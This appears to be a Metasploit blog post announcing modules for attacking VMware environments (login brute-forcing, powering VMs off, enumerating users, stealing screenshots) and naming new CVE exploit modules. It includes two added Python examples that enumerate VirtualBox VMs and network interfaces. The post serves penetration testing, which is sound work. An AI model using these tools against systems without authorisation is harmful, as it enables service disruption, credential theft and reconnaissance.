If you are managing virtual servers, you may have come across the VMware vSphere Web Services SDK. It's a powerful way to manage virtual machines on ESX/ESXi and vCenter Server systems, with documentation that rivals the New York phone book (if it still exists as a printed version). Like most self-respecting APIs, it requires you to authenticate with a username and password. This password may be the lynchpin of your virtual data security. In other words, you may be well advised to audit that the passwords for this API are not found in Average Joe's common password list.

In the recent 4.2 release, Metasploit has added a new module that brute forces passwords for the VMware vSphere Web Services API, plus a few modules that enable penetration testers to have fun with the virtual data center. The simplest modules enable you to shut down a critical server or spin up a virtual machine that has lain dormant for months - and is probably crawling with vulnerabilities you can attack. You can also collect screenshots from all guest systems, which will come in handy for your security assessment report.

Systems running VMware virtualization technology, including ESX Server and VMware Workstation, also have a service called VMauthD, which enables authentication through the OS's local user credentials. Metasploit now includes a brute force module for VMAuthD authentication, which provides an alternative service to obtain system credentials. If an ESX server is integrated with Windows Active Directory, the enum_users module will even generate a list of all users and groups on the domain, which is fantastic for reconnaissance.

Here's a list of all the fun modules you can throw at your virtualized data center directly from Metasploit:


Metasploit Module / Description

auxiliary/admin/vmware/poweroff_vm
This module will log into the Web API of VMware and try to power off a specified Virtual Machine.

auxiliary/admin/vmware/poweron_vm
This module will log into the Web API of VMware and try to power on a specified Virtual Machine.

auxiliary/admin/vmware/tag_vm
This module will log into the Web API of VMware and 'tag' a specified Virtual Machine. It does this by logging a user event with user-supplied text.

auxiliary/admin/vmware/terminate_esx_sessions
This module will log into the Web API of VMware and try to terminate user login sessions as specified by the session keys.

post/multi/gather/find_vmx
This module will attempt to find any VMware virtual machines stored on the target.

auxiliary/scanner/vmware/esx_fingerprint
This module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server.

auxiliary/scanner/vmware/vmauthd_login
This module will test vmauthd logins on a range of machines and report successful logins.

auxiliary/scanner/vmware/vmware_enum_permissions
This module will log into the Web API of VMware and try to enumerate all the user/group permissions. Unlike vmware_enum_users, this returns only users and groups that specifically have permissions defined within the VMware product.

auxiliary/scanner/vmware/vmware_enum_sessions
This module will log into the Web API of VMware and try to enumerate all the login sessions.

auxiliary/scanner/vmware/vmware_enum_users
This module will log into the Web API of VMware and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.

auxiliary/scanner/vmware/vmware_enum_vms
This module attempts to discover virtual machines on any VMware instance running the web interface. This would include ESX/ESXi and VMware Server.

auxiliary/scanner/vmware/vmware_host_details
This module attempts to enumerate information about the host systems through the VMware web API. This can include information about the hardware installed on the host machine.

auxiliary/scanner/vmware/vmware_http_login
This module attempts to authenticate to the VMware HTTP service for VMware Server, ESX, and ESXi.

auxiliary/scanner/vmware/vmware_screenshot_stealer
This module uses supplied login credentials to connect to VMware via the web interface. It then searches through the data stores looking for screenshots. It will download any screenshots it finds and save them as loot.

In addition to the VMware modules, we've also added a post-exploitation module for VirtualBox, called post/multi/gather/enum_vbox. This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered for the current user, therefore, this module needs to be invoked from a user context.
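The per-user limitation comes from where VirtualBox keeps its registry: each user has a VirtualBox.xml whose MachineRegistry element lists the uuid and .vbox path of every VM registered by that user. As an added example (not the enum_vbox module's own code), the script below parses such a registry and, when run on a real machine, reads the invoking user's file from the default location, which is why it sees only that user's machines. REGISTRY_XML is a constructed sample; the default paths are the ones VirtualBox uses on Linux, macOS and Windows, and VBOX_USER_HOME overrides them.

```python
"""Enumerate VirtualBox VMs registered for the current user by reading the
per-user VirtualBox.xml registry.  Added example, not Metasploit's enum_vbox
module.  REGISTRY_XML is a constructed sample of that file."""
import os
import sys
import xml.etree.ElementTree as ET

VBOX_NS = "{http://www.virtualbox.org/}"

REGISTRY_XML = """<?xml version="1.0"?>
<VirtualBox xmlns="http://www.virtualbox.org/" version="1.12-linux">
  <Global>
    <MachineRegistry>
      <MachineEntry uuid="{11111111-2222-3333-4444-555555555555}"
                    src="/home/lab/VirtualBox VMs/dc01/dc01.vbox"/>
      <MachineEntry uuid="{66666666-7777-8888-9999-000000000000}"
                    src="/home/lab/VirtualBox VMs/old-web/old-web.vbox"/>
    </MachineRegistry>
  </Global>
</VirtualBox>
"""


def registry_path():
    """Default per-user registry location; VBOX_USER_HOME overrides it."""
    override = os.environ.get("VBOX_USER_HOME")
    if override:
        return os.path.join(override, "VirtualBox.xml")
    home = os.path.expanduser("~")
    if sys.platform.startswith("win"):
        return os.path.join(home, ".VirtualBox", "VirtualBox.xml")
    if sys.platform == "darwin":
        return os.path.join(home, "Library", "VirtualBox", "VirtualBox.xml")
    return os.path.join(home, ".config", "VirtualBox", "VirtualBox.xml")


def registered_vms(xml_text):
    """Return [(uuid, vbox_path)] for every MachineEntry in the registry text."""
    root = ET.fromstring(xml_text)
    return [(entry.get("uuid"), entry.get("src"))
            for entry in root.iter(VBOX_NS + "MachineEntry")]


def vm_details(vbox_path):
    """Name and guest OS type from a .vbox file, or None if it is unreadable."""
    try:
        machine = ET.parse(vbox_path).getroot().find(VBOX_NS + "Machine")
    except (OSError, ET.ParseError):
        return None
    if machine is None:
        return None
    return {"name": machine.get("name"), "os": machine.get("OSType")}


def enumerate_current_user():
    """VMs registered by whoever runs this; [] when the user has no registry."""
    path = registry_path()
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8") as fh:
        return registered_vms(fh.read())


if __name__ == "__main__":
    for uuid, src in enumerate_current_user() or registered_vms(REGISTRY_XML):
        print(uuid, src, vm_details(src))
```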
If you would like to hear more about pentesting virtual environments, sign up for our free webcast with David Maloney from the Metasploit engineering team who developed most of the new virtual pwning goodness.

This is a pretty modest update, since it's the first after our successful 4.2 release last week. Now that 4.2 is out the door, we've been picking up on core framework development, and of course, have a few new modules shipping out.


Meterpreter Updates


James "egyp7" Lee and community contributor mm__ have been banging on the POSIX side of Meterpreter development this week, and have a couple of significant enhancements to Linux Meterpreter. The most significant change is switching to netlink sockets for discovering network interfaces -- previously, Meterpreter used libpcap, which had a couple of downsides. The first is that libpcap doesn't show interfaces that you cannot sniff on. This, in turn, leads to an even bigger issue: you can't sniff at all unless you're root on most machines, so normal users usually don't see any interfaces at all. During the transition, mm__ also added support for listing IPv6 addresses, and egyp7 is working on having Windows meterpreter doing the same thing soon.
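To make the netlink approach concrete, here is an added example (not the Meterpreter code itself) that sends an RTM_GETADDR dump request over an rtnetlink socket and parses the RTM_NEWADDR replies, including IPv6 addresses. No capture privilege is involved, so it works as an ordinary user and lists interfaces you could not sniff on. The live query in dump_addresses() assumes a Linux kernel; SAMPLE_REPLY is a constructed reply built with the same message layout so the parser can be exercised without one.

```python
"""Enumerate interface addresses via rtnetlink (RTM_GETADDR), the approach
the Linux Meterpreter switched to.  Added example; the live query needs Linux,
SAMPLE_REPLY is a constructed message for offline parsing."""
import socket
import struct

# constants from linux/netlink.h, linux/rtnetlink.h, linux/if_addr.h
NLMSG_DONE = 3
RTM_NEWADDR, RTM_GETADDR = 20, 22
NLM_F_REQUEST, NLM_F_DUMP = 0x1, 0x300
IFA_ADDRESS, IFA_LOCAL, IFA_LABEL = 1, 2, 3
NLMSG_HDR = struct.Struct("=IHHII")   # nlmsghdr: len, type, flags, seq, pid
IFADDRMSG = struct.Struct("=BBBBI")   # ifaddrmsg: family, prefixlen, flags, scope, index
RTATTR = struct.Struct("=HH")         # rtattr: len, type


def align4(n):
    return (n + 3) & ~3


def iter_messages(data):
    """Yield (type, body) for each netlink message in a buffer."""
    off = 0
    while off + NLMSG_HDR.size <= len(data):
        msg_len, msg_type, _flags, _seq, _pid = NLMSG_HDR.unpack_from(data, off)
        if msg_len < NLMSG_HDR.size:
            break                              # malformed length; do not spin
        yield msg_type, data[off + NLMSG_HDR.size: off + msg_len]
        off += align4(msg_len)


def iter_attrs(body, start):
    """Yield (type, payload) for each rtattr after offset `start` in `body`."""
    pos = start
    while pos + RTATTR.size <= len(body):
        rta_len, rta_type = RTATTR.unpack_from(body, pos)
        if rta_len < RTATTR.size:
            break
        yield rta_type, body[pos + RTATTR.size: pos + rta_len]
        pos += align4(rta_len)


def parse_addr_dump(data):
    """Turn RTM_NEWADDR messages into dicts: ifindex, family, prefixlen, address, label."""
    entries = []
    for msg_type, body in iter_messages(data):
        if msg_type == NLMSG_DONE:
            break
        if msg_type != RTM_NEWADDR or len(body) < IFADDRMSG.size:
            continue
        family, prefixlen, _flags, _scope, ifindex = IFADDRMSG.unpack_from(body)
        if family not in (socket.AF_INET, socket.AF_INET6):
            continue
        entry = {"ifindex": ifindex, "family": family, "prefixlen": prefixlen,
                 "address": None, "label": None}
        for rta_type, payload in iter_attrs(body, IFADDRMSG.size):
            # IPv4 reports the interface's own address as IFA_LOCAL (IFA_ADDRESS
            # is the peer on point-to-point links); IPv6 only sends IFA_ADDRESS
            if rta_type == IFA_LOCAL or (rta_type == IFA_ADDRESS and entry["address"] is None):
                entry["address"] = socket.inet_ntop(family, payload)
            elif rta_type == IFA_LABEL:
                entry["label"] = payload.split(b"\0", 1)[0].decode()
        entries.append(entry)
    return entries


def rtattr(rta_type, payload):
    raw = RTATTR.pack(RTATTR.size + len(payload), rta_type) + payload
    return raw + b"\0" * (align4(len(raw)) - len(raw))


def build_newaddr(family, prefixlen, ifindex, address, label=None):
    """Build one RTM_NEWADDR message; used only to construct sample input."""
    attrs = rtattr(IFA_ADDRESS, socket.inet_pton(family, address))
    if label is not None:
        attrs += rtattr(IFA_LABEL, label.encode() + b"\0")
    body = IFADDRMSG.pack(family, prefixlen, 0, 0, ifindex) + attrs
    return NLMSG_HDR.pack(NLMSG_HDR.size + len(body), RTM_NEWADDR, 0, 0, 0) + body


# constructed reply: lo and eth0 with an IPv4 address, eth0 with a link-local IPv6
SAMPLE_REPLY = (build_newaddr(socket.AF_INET, 8, 1, "127.0.0.1", "lo")
                + build_newaddr(socket.AF_INET, 24, 2, "10.0.1.4", "eth0")
                + build_newaddr(socket.AF_INET6, 64, 2, "fe80::1")
                + NLMSG_HDR.pack(NLMSG_HDR.size + 4, NLMSG_DONE, 0, 0, 0) + b"\0\0\0\0")


def dump_addresses():
    """Ask the running Linux kernel for every address; no root required."""
    sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
    try:
        sock.bind((0, 0))
        req = (NLMSG_HDR.pack(NLMSG_HDR.size + IFADDRMSG.size, RTM_GETADDR,
                              NLM_F_REQUEST | NLM_F_DUMP, 1, 0)
               + IFADDRMSG.pack(socket.AF_UNSPEC, 0, 0, 0, 0))
        sock.send(req)
        data = b""
        while True:                            # multi-part dump ends with NLMSG_DONE
            chunk = sock.recv(65536)
            data += chunk
            if any(t == NLMSG_DONE for t, _ in iter_messages(chunk)):
                break
        return parse_addr_dump(data)
    finally:
        sock.close()


if __name__ == "__main__":
    for e in dump_addresses():
        print(e["ifindex"], e["label"] or "-", "%s/%d" % (e["address"], e["prefixlen"]))
```

Note that IPv6 addresses never carry an IFA_LABEL attribute, so the label has to be resolved separately (for instance via an RTM_GETLINK dump keyed on ifindex) if you want interface names for them; the example keeps the index instead.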


Since egyp7 is back to full-time framework development work (he's been away during a penetration testing stint), expect to see more advances in core framework functionality in the coming weeks.

New Modules

While the module count this week isn't quite as impressive as some of the giant piles of exploits we've pushed out in the past, it's interesting to note that of the five new modules we're shipping this week, each one addresses a different exploitation vector.


  • lantronix_telnet_version parses out the banner information for a Lantronix Telnet Service (by TheLightCosine), making for a classic information disclosure -- why bother with fancy fingerprinting techniques when the service will just tell attackers exactly what version it is?
  • orbit_download_failed_bof exploits CVE-2008-1602, a file format vulnerability in Orbit Downloader (by Juan Vazquez). By enticing a user to open an Orbit Downloader "metalink" formatted file, the attacker can trigger an access violation and seize the execution path.
  • hp_data_protector_cmd_exec exploits CVE-2011-0923, which is a remote unauthenticated command exec vulnerability in HP's Data Protector product (by wireghoul and c4an).
  • java_ws_vmargs exploits CVE-2012-0500, which is another command execution vuln; this time, on the client, via a specially-crafted JNLP file (by jduck). Note that this exploit uses a crafty WebDAV vector to get the goods to the victim, which is pretty cool. Watch your egress rules!
  • trendmicro_cmdprocessor_addtask exploits CVE-2011-5001, a remote stack buffer overflow in TrendMicro's Control Manager. It's always fun to exploit buffer overflows in security software.


Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.
